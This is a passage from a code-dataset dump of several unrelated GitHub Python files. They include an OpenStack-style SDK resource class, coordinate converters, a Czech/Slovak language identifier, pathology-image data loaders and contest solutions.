time.strftime(\"%d%m%y_%H%M%S\")\n df.to_csv(root + metric_output + 'metrics_' + now + \".csv\", index = False)\nprint(\"finished training\")\n\n","repo_name":"gideonTeo/Cancer-","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23760806557","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom ecl.identity import identity_service\nfrom ecl import resource\n\n\nclass Project(resource.Resource):\n resource_key = 'project'\n resources_key = 'projects'\n base_path = '/projects'\n service = identity_service.IdentityService()\n\n # capabilities\n allow_create = True\n allow_retrieve = True\n allow_update = True\n allow_delete = True\n allow_list = True\n patch_update = True\n\n # Properties\n #: The description of the project. *Type: string*\n description = resource.prop('description')\n #: References the domain ID which owns the project; if a domain ID is not\n #: specified by the client, the Identity service implementation will\n #: default it to the domain ID to which the client's token is scoped.\n #: *Type: string*\n domain_id = resource.prop('domain_id')\n #: Setting this attribute to ``False`` prevents users from authorizing\n #: against this project. Additionally, all pre-existing tokens authorized\n #: for the project are immediately invalidated. Re-enabling a project\n #: does not re-enable pre-existing tokens. *Type: bool*\n is_enabled = resource.prop('enabled', type=bool)\n #: Unique project name, within the owning domain. *Type: string*\n name = resource.prop('name')\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/identity/v3/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"14655595026","text":"from random import randint\r\nfrom wan import *\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib import parse\r\nimport re\r\nimport requests\r\n#input : specified data structure as below\r\n# {\r\n# keyword_1 : key1\r\n# \tassociated_1 : word1\r\n# \tassociated_2 : word2\r\n# \t...\r\n# keyword_2 : \r\n# \tassociated_1 : word1\r\n# \tassociated_2 : word2\r\n# \t...\r\n# ...\r\n# keyword_n : key1\r\n# ...\r\n# }\r\n\r\n\r\n#1 Abbreviation\r\ndef generate_abbreviation(associated_words_set,n):\r\n\tname_list = phrase_generation(associated_words_set,n)\r\n\t\r\n\tname_string = '+'.join(name_list)\r\n\turl = 'https://acronymify.com/search?q='+name_string\r\n\trequest = urllib.request.Request(url,headers={'User-Agent': 'Mozilla/5.0'})\r\n\tdata = urllib.request.urlopen(request).read().decode() #UTF-8 encode\r\n\tbs = BeautifulSoup(data,'lxml')\r\n\tent = bs.find_all('tr')\r\n\tm = len(ent)\r\n\tres = []\r\n\tfor i in range(1,m):\r\n\t\tres.append(ent[i].find_all('a')[0].text)\r\n\treturn res\r\n\r\n#2 Acronym\r\ndef generate_acronym(associated_words_set,n):\r\n\tname_list = phrase_generation(associated_words_set,n)\r\n\tABB = \"\"\r\n\tfor word in name_list:\r\n\t\tABB+=word[0].upper()\r\n\treturn ABB,name_list\r\n# helper function\r\n\r\n# Helper 1\r\ndef phrase_generation(associated_words_set,n):\r\n\ta = randint(2,n) # 단어 수 결정 \r\n\tn_list = [i for i in range(0,n)]\r\n\tname_list = []\r\n\t# acronym을 만들 단어를 랜덤하게 생성 \r\n\tfor i in range(a):\r\n\t\tk = n_list.pop(randint(0,len(n_list)-1))\r\n\t\tprint('k : ',k)\r\n\t\tname_list.append(get_random_associate_word_of_kth_keyword(associated_words_set,k))\r\n\treturn name_list\r\n# Helper 2\r\ndef get_random_associate_word_of_kth_keyword(associated_words_set,k):\r\n\t\r\n\ti = randint(0,49)\r\n\tprint (' get ith number :',i)\r\n\tword = associated_words_set[k]['items'][i]['item']\r\n\treturn word\r\n\r\n# for test\r\ndef test():\r\n\ttext_string = 'fresh water white cool'\r\n\tn = len(text_string.split(' '))\r\n\tassociated_words_set = search_WAN('fresh water white cool')\r\n\tabb = generate_acronym(associated_words_set,n)\r\n\tprint(abb)\r\n\treturn","repo_name":"hyun78/Eureka","sub_path":"Eureka_web/app/combiner_1.py","file_name":"combiner_1.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6261159577","text":"# -*- coding: utf-8 -*-\nimport re\n\ndef dms2dd(degrees, minutes, seconds, direction):\n dd = float(degrees) + float(minutes)/60 + float(seconds)/(60*60);\n if direction == 'S' or direction == 'W':\n dd *= -1\n return dd;\n\ndef dd2dms(deg):\n d = int(deg)\n md = abs(deg - d) * 60\n m = int(md)\n sd = (md - m) * 60\n return [d, m, sd]\n\ndef parse_dms(dms):\n parts = re.split('[^\\d\\w]+', dms)\n lat = dms2dd(parts[0], parts[1], parts[2], parts[3])\n lng = dms2dd(parts[4], parts[5], parts[6], parts[7])\n\n return (lat, lng)\n","repo_name":"santiag0aragon/icc","sub_path":"icc/aux/lat_log_utils.py","file_name":"lat_log_utils.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"1191486043","text":"from math import pi\nfrom constants import ρ_p\nimport numpy as np\n\nclass Particle:\n #Lag ein tabell med tidspunkt og posisjon for kvar einskild partikkel.\n def __init__(self, diameter, init_position, init_time=0, density=ρ_p ):\n self.diameter= diameter # mm\n self.init_position = init_position # mm\n self.init_time = init_time # s\n self.density = density # kg/mm³\n self.volume = self.diameter**3 * pi * 1/6 # mm³\n self.mass = self.volume * self.density # kg\n self.radius = self.diameter/2 # mm\n self.index = 0\n self.atol = 1e-6\n self.rtol = 1e-3\n self.method = 'RK45'\n self.linear = True\n self.lift = True\n self.addedmass = True\n self.resting = False\n self.still = False\n self.wrap_counter = 0\n self.wrap_max = 50\n self.resting_tolerance = 0.01\n\n def sti_list(self):\n sti = self.sti_dict\n init = int(sti['init_time'])\n final = int(sti['final_time'])\n plott_array = np.zeros((final+1-init,4))\n for frame in range(init,final+1):\n plott_array[frame-init,:] = np.asarray(sti[frame]['position'])#+np.asarray([sti[frame]['loops']*x_width,0,0,0])\n return plott_array\n\ndef particle_copy(pa):\n return Particle(pa.diameter, pa.init_position, pa.density)\n\n","repo_name":"Havrevoll/Ribber","sub_path":"particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74215256513","text":"import numpy as np\r\nimport re\r\nimport string\r\nimport math\r\nimport preparation as prep\r\nimport table as tb\r\nimport fasttext\r\n\r\ndef readFromFile(file_path):\r\n f=open(file_path, \"r\", encoding=\"utf8\")\r\n if f.mode == 'r':\r\n contents =f.read()\r\n return contents\r\n return \"\"\r\n\r\ndef trainData(data):\r\n #remove diacritics and special symbols\r\n text = prep.stripText(data)\r\n \r\n # make 3D table of trigrams from the text\r\n table = tb.countTrigrams(data)\r\n \r\n # smooth table\r\n table = tb.smoothTable(table)\r\n return table \r\n\r\ndef testData(text, table1, table2):\r\n lm1 = tb.calculateLM(text,table1)\r\n lm2 = tb.calculateLM(text,table2)\r\n if lm1>lm2:\r\n return 1\r\n if lm2>lm1:\r\n return 2\r\n if lm1==lm2:\r\n return 1.5\r\n else:\r\n return 0\r\n\r\ndef testText(text1, table1, table2, expected):\r\n print(\"Testing text:\")\r\n print(\"expected result = \")\r\n print(expected)\r\n print(\"given result : \")\r\n result = testData(text1,table1,table2)\r\n print(result)\r\n if result==expected:\r\n print(\"Test successful\")\r\n return 1\r\n elif result == 0:\r\n print(\"Error\")\r\n return 0\r\n else:\r\n print(\"Test failed\")\r\n return 0\r\n\r\n\r\ndef prepareText(data):\r\n text = prep.stripText(data)\r\n return text\r\n\r\ndef prepareSimpleText(data):\r\n text = prep.stripText(data)\r\n text = prep.stripDia(data)\r\n return text\r\n\r\ndef testFastText(predictions,cond):\r\n if predictions[0] == cond:\r\n print(\"Test successful\")\r\n return 1\r\n else:\r\n print(\"Test failed\")\r\n return 0\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n #load text\r\n dataset1 = readFromFile(\"./sampledata1.txt\")\r\n dataset2 = readFromFile(\"./sampledata2.txt\")\r\n \r\n #train data - receive a probability table\r\n table1 = trainData(dataset1)\r\n table2 = trainData(dataset2)\r\n tableD1 = trainData(prepareSimpleText(dataset1))\r\n tableD2 = trainData(prepareSimpleText(dataset2))\r\n \r\n #preparing testing data\r\n text1 = prepareText(\"a toto je první přiklad na testováni\")\r\n text2 = prepareText(\"Druhý příklad textu pro rozpoznání jazyka který je napsaný v češtině. A obsahuje několik vět. Jako například tato poslední\")\r\n text3 = prepareText(\"Pôvod mena Dúbravka je založený na povestiach. Jedna hovorí, že meno dostala podľa veľkých dubových lesov, ktoré tu kedysi boli. Iná hovorí o tom, že chorvátska princezná Dúbravka, ktorá utekala pred Turkami, tu bola zajatá. Tretia je o tom, že drevorubači, ktorí rúbali v lese drevo, mali so sebou psov. Tí sa po lese naháňali. Jeden z nich sa schoval do bútľavého stromu a odtiaľ štekal. Drevorubači si medzi sebou hovorili, že dub hafká. Z toho vznikol názov Dúbravka.\")\r\n text4 = prepareText(\"Po rekonštrukcii starého súboru obchodov vznikol Obchodný dom Saratov, v ktorom je viac ako 30 prevádzok a okrem iného aj potraviny Billa, predajňa elektrospotrebičov, drogéria, pošta, lekárne, módne butiky, papiernictvo, kvetinárstvo, kaviareň a stánok s domácou a zahraničnou tlačou.\")\r\n text5 = prepareText(readFromFile(\"./sampledata5.txt\"))\r\n text6 = prepareText(readFromFile(\"./sampledata6.txt\"))\r\n text7 = prepareText(readFromFile(\"./sampledata7.txt\"))\r\n text8 = prepareText(readFromFile(\"./sampledata8.txt\"))\r\n text9 = prepareText(readFromFile(\"./sampledata9.txt\"))\r\n \r\n textD1 = prepareSimpleText(text1)\r\n textD2 = prepareSimpleText(text2)\r\n textD3 = prepareSimpleText(text3)\r\n textD4 = prepareSimpleText(text4)\r\n textD5 = prepareSimpleText(text5)\r\n textD6 = prepareSimpleText(text6)\r\n textD7 = prepareSimpleText(text7)\r\n textD8 = prepareSimpleText(text8)\r\n textD9 = prepareSimpleText(text9)\r\n \r\n #testing data with diacritics\r\n successRate = 0\r\n count = 0 \r\n print(\"Testing texts with diacritics:\")\r\n successRate += testText(text1,table1,table2,1)\r\n count+=1\r\n successRate += testText(text2,table1,table2,1)\r\n count+=1\r\n successRate += testText(text3,table1,table2,2)\r\n count+=1\r\n successRate += testText(text4,table1,table2,2)\r\n count+=1\r\n successRate += testText(text5,table1,table2,1)\r\n count+=1\r\n successRate += testText(text6,table1,table2,1)\r\n count+=1\r\n successRate += testText(text7,table1,table2,2)\r\n count+=1\r\n successRate += testText(text8,table1,table2,2)\r\n count+=1\r\n successRate += testText(text9,table1,table2,2)\r\n count+=1\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n print()\r\n\r\n #testing data without diacritics\r\n successRate = 0\r\n count = 0 \r\n print(\"Testing texts without diacritics:\")\r\n successRate += testText(textD1,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD2,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD3,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD4,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD5,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD6,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD7,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD8,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD9,tableD1,tableD2,2)\r\n count+=1\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n print()\r\n\r\n #testing text with fasttext for comparison\r\n PRETRAINED_MODEL_PATH = './lid.176.bin'\r\n model = fasttext.load_model(PRETRAINED_MODEL_PATH)\r\n\r\n successRate = 0\r\n count = 0 \r\n check = ['',('__label__cs',),('__label__sk',)]\r\n sentences = text1\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n sentences = text2\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n sentences = text3\r\n predictions = model.predict(sentences)\r\n print(\"testing Sk text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text4\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text5\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text6\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text7\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text8\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text9\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD1\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD2\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD3\r\n predictions = model.predict(sentences)\r\n print(\"testing Sk text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD4\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD5\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD6\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD7\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD8\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD9\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n print()\r\n\r\n","repo_name":"Jaroslav-Hrabal/LanguageRecognition","sub_path":"LanguageRecognition.py","file_name":"LanguageRecognition.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457614031","text":"cases = []\r\nwith open('A-large.in') as f:\r\n n = int(f.readline())\r\n for i,line in enumerate(f):\r\n s,total = 0,0\r\n smax,digits = line.split()\r\n for j,k in enumerate(digits):\r\n if total < j:\r\n s += j-total\r\n total += j-total\r\n total += int(k)\r\n cases.append('Case #'+str(i+1)+': '+str(s)+'\\n')\r\n\r\nwith open('A-large-attempt0.out','w+') as g:\r\n g.writelines(cases)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/895.py","file_name":"895.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74728278594","text":"N, X = map(int, raw_input().split())\nx = map(int, raw_input().split())\n\nprint(N, X, x)\n\nen = X * (N + 1)\nprint(en)\nbefore = None\nx.append(0)\nfor i, v in enumerate(sorted(x, reverse=True)):\n if i == 0:\n en += ((i + 1) ** 2) * v\n else:\n en += ((i + 1) ** 2) * (before - v)\n before = v\n\n print(en)\n\n\n","repo_name":"kokukuma/atcoder","sub_path":"agc027/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3315924308","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom utils.data_utils import extract_df_info\nfrom typing import Dict, Optional, Tuple\n\n\nclass DataGenerator():\n \"\"\"\n Object to obtain the patches and labels.\n \"\"\"\n def __init__(self, config: Dict):\n \"\"\"\n Initialize data generator object\n :param config: dict containing config\n \"\"\"\n self.data_config = config[\"data\"]\n self.model_config = config[\"model\"]\n self.train_df = None\n self.val_df = None\n self.test_df = None\n self.wsi_df = None\n self.num_training_samples = 0\n self._create_data_generators()\n\n def _create_data_generators(self):\n \"\"\"\n Create data generators for supervised or semi-supervised multiple instance learning.\n The number of patch labels specified by 'positive_instance_labels_per_bag' is automatically obtained by\n randomly masking patch labels.\n\n :return: Keras image data generator providing the patches and (if available) labels.\n \"\"\"\n mode = self.model_config[\"mode\"]\n data_config = self.data_config\n if mode == 'train':\n self.load_dataframes(split='train')\n # Init setting of semi-supervised MIL training\n if data_config['supervision'] in ['mil', 'ssl']:\n self.train_generator_strong_aug = self.data_generator_from_dataframe(self.train_df, image_augmentation='strong',\n shuffle=True, target_mode='index')\n self.train_generator_weak_aug = self.data_generator_from_dataframe(self.train_df_weak_aug, image_augmentation='weak',\n shuffle=False, target_mode='None')\n self.num_training_samples = self.train_generator_weak_aug.n\n # Init supervised training setting\n else:\n self.train_df = self.train_df[self.train_df['class'] != self.data_config['num_classes']].reset_index()\n self.train_generator_strong_aug = self.data_generator_from_dataframe(self.train_df, image_augmentation='strong',\n shuffle=True, target_mode='index')\n self.train_generator_weak_aug = self.train_generator_strong_aug\n self.num_training_samples = self.train_generator_strong_aug.n\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n elif mode =='test' or mode == 'predict':\n self.load_dataframes(split='test')\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n self.test_generator = self.data_generator_from_dataframe(self.test_df, target_mode='raw')\n self.num_training_samples = self.test_generator.n # just formally necessary for model initialization\n elif mode == 'predict_features':\n self.load_dataframes(split='train')\n self.train_generator_weak_aug = self.data_generator_from_dataframe(self.train_df,\n image_augmentation='weak',\n shuffle=False, target_mode='None')\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n self.load_dataframes(split='test')\n self.test_generator = self.data_generator_from_dataframe(self.test_df, target_mode='raw')\n\n else:\n raise Exception('Choose valid model mode')\n\n def data_generator_from_dataframe(self, dataframe: pd.DataFrame, image_augmentation: str = 'None',\n shuffle: bool = False, target_mode: str = 'class'):\n \"\"\"\n Wrapper around 'flow_from_dataframe'-method. Uses loaded dataframes to load images and labels.\n\n :param dataframe: dataframe containing patch paths and labels\n :param image_augmentation: 'strong','weak' or 'None' indicating the level of augmentation\n :param shuffle: bool to shuffle the data after each epoch\n :param target_mode: 'class': loads patch classes, 'index': loads indices instead, or 'None' only loads images\n :return: data generator loading patches and labels (or indices)\n \"\"\"\n if image_augmentation == 'weak':\n datagen = ImageDataGenerator(\n brightness_range=self.data_config[\"weak_augment_brightness_range\"],\n channel_shift_range=self.data_config[\"weak_augment_channel_shift\"],\n rotation_range=360,\n fill_mode='reflect',\n horizontal_flip=True,\n vertical_flip=True)\n elif image_augmentation == 'strong':\n datagen = ImageDataGenerator(\n brightness_range=self.data_config[\"strong_augment_brightness_range\"],\n channel_shift_range=self.data_config[\"strong_augment_channel_shift\"],\n rotation_range=360,\n fill_mode='reflect',\n horizontal_flip=True,\n vertical_flip=True)\n else:\n datagen = ImageDataGenerator()\n\n if target_mode == 'class':\n y_col = 'class'\n class_mode = 'categorical'\n classes = [str(i) for i in range(self.data_config[\"num_classes\"])]\n elif target_mode == 'index':\n y_col = 'index'\n class_mode = 'raw'\n classes = None\n else:\n y_col = 'index'\n class_mode = None\n classes = None\n\n dataframe['index'] = dataframe.index\n\n generator = datagen.flow_from_dataframe(\n dataframe=dataframe,\n directory=self.data_config[\"dir\"],\n x_col=\"image_path\",\n y_col=y_col,\n target_size=self.data_config[\"image_target_size\"],\n batch_size=self.model_config[\"batch_size\"],\n shuffle=shuffle,\n classes=classes,\n class_mode=class_mode,\n # save_to_dir=self.data_config['artifact_dir'] + '/' + image_augmentation,\n # save_format='jpeg'\n )\n\n return generator\n\n def load_dataframes(self, split):\n \"\"\"\n Load tables containing the patch paths and potentially classes.\n Loaded dataframes are stored as member variables.\n :param split: 'train', 'val' or 'test'\n \"\"\"\n if self.data_config[\"dataset_name\"] == \"breast_hist_images\":\n if split == 'train':\n train_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"train.txt\"))\n train_df[\"class\"] = train_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.train_df = train_df\n val_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.txt\"))\n val_df[\"class\"] = val_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.val_df = val_df\n elif split == 'test':\n test_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test.txt\"))\n test_df[\"class\"] = test_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.test_df = test_df\n elif self.data_config[\"dataset_name\"] == \"camelyon16\":\n wsi_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"wsi_labels.csv\")).drop_duplicates().reset_index()\n wsi_df['class'] = wsi_df['P'].astype(int)\n wsi_df.rename(columns={\"slide\": \"slide_id\"}, inplace=True)\n self.wsi_df = wsi_df\n if split == 'train':\n train_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"train.csv\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test.csv\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n elif self.data_config[\"dataset_name\"] == \"sicapv2\":\n self.wsi_df = pd.read_excel(os.path.join(self.data_config[\"dir\"], \"wsi_labels.xlsx\"))\n if split == 'train':\n train_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Train.xlsx\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n elif self.data_config[\"dataset_name\"] == \"panda\":\n wsi_df = pd.read_csv(os.path.join(self.data_config[\"dir\"], \"wsi_labels.csv\"))\n wsi_df['Gleason_primary'] = wsi_df['gleason_score'].str.split('+').str[0].astype(int)\n wsi_df['Gleason_secondary'] = wsi_df['gleason_score'].str.split('+').str[1].astype(int)\n wsi_df.rename(columns={\"image_id\": \"slide_id\"}, inplace=True)\n self.wsi_df = wsi_df\n if split == 'train':\n train_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"train_patches.csv\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val_patches.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val_patches.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test_patches.csv\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n else:\n raise Exception(\"Please choose valid dataset name!\")\n\n def get_train_data_statistics(self):\n \"\"\"\n Calculate the number of labeled patches, classes and WSIs for statistics.\n :return: dict of statistics\n \"\"\"\n train_df = self.train_df\n wsi_df = self.wsi_df\n wsi_names = np.unique(np.array(train_df['wsi']))\n out_dict = {}\n out_dict['number_of_wsis'] = len(wsi_names)\n out_dict['number_of_patches'] = len(train_df)\n if self.data_config[\"dataset_type\"] == \"prostate_cancer\":\n out_dict['number_of_negative_patch_labels'] = np.sum(train_df['class'] == '0')\n out_dict['number_of_positive_patch_labels'] = np.sum(train_df['class'] == '1')\\\n + np.sum(train_df['class'] == '2') \\\n + np.sum(train_df['class'] == '3')\n out_dict['number_of_unlabeled_patches'] = np.sum(train_df['class'] == '4')\n else:\n out_dict['number_of_negative_patch_labels'] = np.sum(train_df['class'] == '0')\n out_dict['number_of_positive_patch_labels'] = np.sum(train_df['class'] == '1')\n out_dict['number_of_unlabeled_patches'] = np.sum(train_df['class'] == '2')\n\n return out_dict\n\n","repo_name":"arneschmidt/ssl_and_mil_cancer_classification","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"37199893291","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nrequirements = ['django',]\n\nsetup(\n name='django_template_uuid',\n version='0.0.1',\n description=\"Generate UUIDs for Django templates\",\n author=\"Michał Pasternak\",\n author_email='michal.dtz@gmail.com',\n url='https://github.com/mpasternak/django-template-uuid',\n packages=find_packages(),\n install_requires=requirements,\n license=\"MIT license\",\n zip_safe=True,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n ],\n)\n","repo_name":"mpasternak/django-template-uuid","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5605415520","text":"import cv2\r\nimport os\r\nimport os.path as osp\r\n\r\ncap = cv2.VideoCapture(\"data/train.mp4\")\r\n\r\nbgr_path = \"data/bgr\"\r\nif not osp.exists(bgr_path):\r\n os.makedirs(bgr_path)\r\n\r\n# with open(\"raws/train.txt\", \"r\") as f:\r\n# for i, l in enumerate(f):\r\n# pass\r\n# lines = i + 1\r\n\r\ncounter = 0\r\nwhile cap.isOpened():\r\n flag, img = cap.read()\r\n\r\n if flag:\r\n img = img[130:370]\r\n cv2.imshow(\"Img\", img)\r\n cv2.imwrite(osp.join(bgr_path, str(counter)+\".jpg\"), img)\r\n counter += 1\r\n else:\r\n print(\"finished reading video and writing images\")\r\n break\r\n\r\n cv2.waitKey(1)\r\n","repo_name":"pachiko/speed","sub_path":"readvid.py","file_name":"readvid.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70970412034","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_SecondWindow(object):\r\n def setupUi(self, SecondWindow):\r\n SecondWindow.setObjectName(\"SecondWindow\")\r\n SecondWindow.resize(286, 273)\r\n self.centralwidget = QtWidgets.QWidget(SecondWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.name = QtWidgets.QLabel(self.centralwidget)\r\n self.name.setGeometry(QtCore.QRect(51, 11, 220, 21))\r\n self.name.setObjectName(\"name\")\r\n self.eng = QtWidgets.QCheckBox(self.centralwidget)\r\n self.eng.setGeometry(QtCore.QRect(52, 78, 107, 20))\r\n 